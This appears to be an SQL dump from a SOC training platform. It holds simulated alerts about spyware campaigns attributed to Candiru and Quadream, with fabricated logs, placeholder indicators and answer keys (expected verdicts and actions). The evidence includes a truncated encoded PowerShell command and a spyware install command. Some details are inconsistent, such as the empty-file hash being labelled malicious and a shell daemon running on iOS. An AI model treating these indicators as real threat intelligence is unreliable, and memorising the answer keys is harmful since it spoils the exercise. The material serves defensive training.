individuals.\\\",\\\"indicators\\\":[{\\\"type\\\":\\\"ip\\\",\\\"value\\\":\\\"203.0.113.45\\\",\\\"description\\\":\\\"External 
command and control server associated with attack\\\"},{\\\"type\\\":\\\"hash\\\",\\\"value\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"description\\\":\\\"Malware sample used in the operation\\\"},{\\\"type\\\":\\\"filename\\\",\\\"value\\\":\\\"spyware_report.docx\\\",\\\"description\\\":\\\"File containing exfiltrated data\\\"},{\\\"type\\\":\\\"username\\\",\\\"value\\\":\\\"john.doe@organization.org\\\",\\\"description\\\":\\\"Compromised user account\\\"}]}\"},{\"timestamp\":\"2026-03-15T20:54:15.371Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-21T14:32:00Z\\\",\\\"event_id\\\":\\\"HRW-2023-1059\\\",\\\"user\\\":\\\"john.doe@organization.org\\\",\\\"internal_ip\\\":\\\"192.168.4.23\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"filename\\\":\\\"spyware_report.docx\\\",\\\"action\\\":\\\"Data Exfiltration\\\",\\\"description\\\":\\\"The spyware was used to gather sensitive information on human rights activities, compromising the privacy of involved individuals.\\\",\\\"indicators\\\":[{\\\"type\\\":\\\"ip\\\",\\\"value\\\":\\\"203.0.113.45\\\",\\\"description\\\":\\\"External command and control server associated with attack\\\"},{\\\"type\\\":\\\"hash\\\",\\\"value\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"description\\\":\\\"Malware sample used in the operation\\\"},{\\\"type\\\":\\\"filename\\\",\\\"value\\\":\\\"spyware_report.docx\\\",\\\"description\\\":\\\"File containing exfiltrated data\\\"},{\\\"type\\\":\\\"username\\\",\\\"value\\\":\\\"john.doe@organization.org\\\",\\\"description\\\":\\\"Compromised user account\\\"}]}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1528, 'Suspicious Browser Exploit Detected', 'high', 'Firewall and IDS/IPS logs', 'Unusual network traffic patterns were detected, indicating a potential browser exploit targeting Windows systems. The exploit appears to be leveraging known vulnerabilities to gain initial access.', 'Initial Access', 'T1190: Exploit Public-Facing Application', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:00Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.25\",\"destination_port\":80,\"protocol\":\"HTTP\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36\",\"request_url\":\"http://compromised-site.com/exploit.js\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"filename\":\"exploit.js\",\"detected_signature\":\"Candiru Browser Exploit\"}', '2026-03-15 19:10:36', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known Candiru activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal company IP.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://compromised-site.com/exploit.js\",\"is_critical\":true,\"osint_result\":{\"source\":\"Open Source Intelligence\",\"verdict\":\"malicious\",\"details\":\"URL hosting exploit code.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known exploit scripts.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1529, 'Malicious Payload Execution', 'high', 'Endpoint Protection Logs', 'Following the initial breach, the attackers deploy their spyware payload, which is designed to execute stealthily within the Windows environment, aiming to gather sensitive information from the target.', 'Execution', 'T1059.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:32:00Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.5\",\"username\":\"jdoe\",\"payload_filename\":\"spyware_payload.exe\",\"payload_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"action\":\"Execution\",\"status\":\"Success\",\"details\":\"Detected execution of a known spyware payload on host 192.168.1.5 by user jdoe. The payload was executed from source IP 203.0.113.45.\"}', '2026-03-15 19:10:36', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malware distribution.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"Corporate asset.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known spyware variant.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"spyware_payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Protection Logs\",\"verdict\":\"malicious\",\"details\":\"Filename associated with spyware delivery.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"clean\",\"details\":\"Legitimate user 
account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1530, 'Establishing Command and Control', 'medium', 'Network Traffic Analysis', 'Anomalous encrypted traffic detected from an internal host to an external IP, indicating a potential command and control setup. The communication was observed using TLS over non-standard ports, which is a common tactic to evade detection.', 'Persistence', 'T1071.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:07Z\",\"src_ip\":\"10.0.2.15\",\"dest_ip\":\"203.0.113.25\",\"dest_port\":8443,\"protocol\":\"TLS\",\"encrypted\":true,\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"malware_hash\":\"e99a18c428cb38d5f260853678922e03\",\"malware_filename\":\"C2Agent.exe\",\"alert\":\"Suspicious encrypted traffic detected\"}', '2026-03-15 19:10:36', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntel\",\"verdict\":\"malicious\",\"details\":\"Known C2 server IP associated with APT group activities.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Malware hash identified as C2Agent variant.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"C2Agent.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"suspicious\",\"details\":\"Unusual file found on host, correlates with C2 activities.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1531, 'Data Exfiltration Detected', 'high', 'Data Loss Prevention (DLP) Logs', 'Sensitive data exfiltration from compromised systems targeting activists and journalists. The attackers are using malicious IPs to extract communications and documents.', 'Exfiltration', 'T1020 - Automated Exfiltration', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_type\":\"data_exfiltration\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"203.0.113.55\",\"destination_port\":443,\"username\":\"jdoe\",\"filename\":\"Sensitive_Communications.zip\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"action_taken\":\"Blocked\",\"protocol\":\"HTTPS\",\"rule_triggered\":\"Exfiltration Rule 7\"}', '2026-03-15 19:10:36', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with APT activity.\"}},{\"id\":\"artifact_2\",\"type\":\"filename\",\"value\":\"Sensitive_Communications.zip\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal DLP\",\"verdict\":\"suspicious\",\"details\":\"File contains sensitive keywords.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with data exfiltration malware.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"internal\",\"details\":\"Employee account used in exfiltration attempt.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.385Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.55\\\",\\\"destination_port\\\":443,\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"Sensitive_Communications.zip\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"action_taken\\\":\\\"Blocked\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"rule_triggered\\\":\\\"Exfiltration Rule 7\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.385Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.55\\\",\\\"destination_port\\\":443,\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"Sensitive_Communications.zip\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"action_taken\\\":\\\"Blocked\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"rule_triggered\\\":\\\"Exfiltration Rule 7\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.385Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.55\\\",\\\"destination_port\\\":443,\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"Sensitive_Communications.zip\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"action_taken\\\":\\\"Blocked\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"rule_triggered\\\":\\\"Exfiltration Rule 7\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.385Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.55\\\",\\\"destination_port\\\":443,\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"Sensitive_Communications.zip\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"action_taken\\\":\\\"Blocked\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"rule_triggered\\\":\\\"Exfiltration Rule 7\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.385Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.55\\\",\\\"destination_port\\\":443,\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"Sensitive_Communications.zip\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"action_taken\\\":\\\"Blocked\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"rule_triggered\\\":\\\"Exfiltration Rule 7\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1532, 'Initial Access via Zero-Click iCloud Calendar Exploit', 'high', 'Network Traffic Logs', 'An unauthorized access attempt was detected originating from a known malicious IP address. The attack leveraged a zero-click vulnerability in iCloud calendar invites, targeting iOS devices. The adversary, identified as Quadream, used this exploit to gain unauthorized access, potentially compromising sensitive information.', 'Phishing Attack', 'T1189: Drive-by Compromise', 1, 'Closed', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_type\":\"network_traffic\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.2.15\",\"protocol\":\"HTTPS\",\"source_port\":443,\"destination_port\":52334,\"malicious_url\":\"https://malicious-calendar-invite.com/icalendar\",\"filename\":\"invitation.ics\",\"file_hash\":\"a9f5b3c7e812f3d6b7e695f6c29e1e4f\",\"username\":\"victim_user\",\"user_agent\":\"iOS/14.8.1 (iPhone; CPU iPhone OS 14_8_1 like Mac OS X)\"}', '2026-03-15 19:11:07', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntel Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.2.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Assets\",\"verdict\":\"internal\",\"details\":\"Internal iOS device.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"https://malicious-calendar-invite.com/icalendar\",\"is_critical\":true,\"osint_result\":{\"source\":\"Phishing URL Database\",\"verdict\":\"malicious\",\"details\":\"URL hosting phishing calendar invites.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"a9f5b3c7e812f3d6b7e695f6c29e1e4f\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Hash Registry\",\"verdict\":\"malicious\",\"details\":\"Hash linked to known iCalendar 
exploit.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1533, 'Execution of REIGN Spyware on iOS', 'high', 'Device Forensics', 'The REIGN spyware was successfully installed and executed on the compromised iOS device. The spyware is designed to monitor and control device activity, posing a significant threat to user privacy and security.', 'Malware Execution', 'T1059: Command and Scripting Interpreter', 1, 'Closed', 283, '{\"timestamp\":\"2023-10-12T14:22:31Z\",\"device_id\":\"iOS-Device-001\",\"user\":\"jdoe\",\"src_ip\":\"192.168.1.15\",\"attacker_ip\":\"203.0.113.45\",\"malware_name\":\"REIGN\",\"malware_hash\":\"8f14e45fceea167a5a36dedd4bea2543\",\"filename\":\"reign_install.pkg\",\"command_executed\":\"/bin/sh -c install_reign.sh\",\"persistence_method\":\"launch_daemon\",\"os_version\":\"iOS 15.4\",\"detection_tool\":\"Forensic Analyzer v4.2\"}', '2026-03-15 19:11:07', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP address associated with multiple APT activities.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"8f14e45fceea167a5a36dedd4bea2543\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known REIGN spyware sample.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"reign_install.pkg\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Reputation Database\",\"verdict\":\"malicious\",\"details\":\"File identified as part of REIGN spyware installation.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"User account on the compromised 
device.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.390Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:31Z\\\",\\\"device_id\\\":\\\"iOS-Device-001\\\",\\\"user\\\":\\\"jdoe\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"malware_name\\\":\\\"REIGN\\\",\\\"malware_hash\\\":\\\"8f14e45fceea167a5a36dedd4bea2543\\\",\\\"filename\\\":\\\"reign_install.pkg\\\",\\\"command_executed\\\":\\\"/bin/sh -c install_reign.sh\\\",\\\"persistence_method\\\":\\\"launch_daemon\\\",\\\"os_version\\\":\\\"iOS 15.4\\\",\\\"detection_tool\\\":\\\"Forensic Analyzer v4.2\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.390Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:31Z\\\",\\\"device_id\\\":\\\"iOS-Device-001\\\",\\\"user\\\":\\\"jdoe\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"malware_name\\\":\\\"REIGN\\\",\\\"malware_hash\\\":\\\"8f14e45fceea167a5a36dedd4bea2543\\\",\\\"filename\\\":\\\"reign_install.pkg\\\",\\\"command_executed\\\":\\\"/bin/sh -c install_reign.sh\\\",\\\"persistence_method\\\":\\\"launch_daemon\\\",\\\"os_version\\\":\\\"iOS 15.4\\\",\\\"detection_tool\\\":\\\"Forensic Analyzer v4.2\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.390Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:31Z\\\",\\\"device_id\\\":\\\"iOS-Device-001\\\",\\\"user\\\":\\\"jdoe\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"malware_name\\\":\\\"REIGN\\\",\\\"malware_hash\\\":\\\"8f14e45fceea167a5a36dedd4bea2543\\\",\\\"filename\\\":\\\"reign_install.pkg\\\",\\\"command_executed\\\":\\\"/bin/sh -c install_reign.sh\\\",\\\"persistence_method\\\":\\\"launch_daemon\\\",\\\"os_version\\\":\\\"iOS 15.4\\\",\\\"detection_tool\\\":\\\"Forensic Analyzer v4.2\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.390Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:31Z\\\",\\\"device_id\\\":\\\"iOS-Device-001\\\",\\\"user\\\":\\\"jdoe\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"malware_name\\\":\\\"REIGN\\\",\\\"malware_hash\\\":\\\"8f14e45fceea167a5a36dedd4bea2543\\\",\\\"filename\\\":\\\"reign_install.pkg\\\",\\\"command_executed\\\":\\\"/bin/sh -c install_reign.sh\\\",\\\"persistence_method\\\":\\\"launch_daemon\\\",\\\"os_version\\\":\\\"iOS 15.4\\\",\\\"detection_tool\\\":\\\"Forensic Analyzer v4.2\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.390Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:31Z\\\",\\\"device_id\\\":\\\"iOS-Device-001\\\",\\\"user\\\":\\\"jdoe\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"malware_name\\\":\\\"REIGN\\\",\\\"malware_hash\\\":\\\"8f14e45fceea167a5a36dedd4bea2543\\\",\\\"filename\\\":\\\"reign_install.pkg\\\",\\\"command_executed\\\":\\\"/bin/sh -c install_reign.sh\\\",\\\"persistence_method\\\":\\\"launch_daemon\\\",\\\"os_version\\\":\\\"iOS 
15.4\\\",\\\"detection_tool\\\":\\\"Forensic Analyzer v4.2\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1534, 'Establishing Persistence on iOS Devices', 'high', 'System Logs', 'REIGN deploys a persistence mechanism on an iOS device by installing a malicious profile named \'com.apple.security\' that ensures continuous access even after reboots or updates. The activity is sourced from a suspicious external IP, indicating a potential compromise.', 'Persistence Mechanism', 'T1547.014', 1, 'Closed', 283, '{\"timestamp\":\"2023-10-04T11:45:23Z\",\"event_type\":\"profile_install\",\"device_id\":\"ios-device-1234\",\"user\":\"jdoe\",\"profile_name\":\"com.apple.security\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.15\",\"file_hash\":\"46b7f3c55b59d4c1a71f3c5e5d4f8f7a\",\"filename\":\"malicious_profile.mobileconfig\",\"action\":\"install\",\"status\":\"successful\"}', '2026-03-15 19:11:07', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known C2 server involved in targeted attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"46b7f3c55b59d4c1a71f3c5e5d4f8f7a\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Identified as part of REIGN\'s persistent attack toolkit.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"malicious_profile.mobileconfig\",\"is_critical\":false,\"osint_result\":{\"source\":\"Local System Analysis\",\"verdict\":\"suspicious\",\"details\":\"Unusual profile name for device management.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"Standard user account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
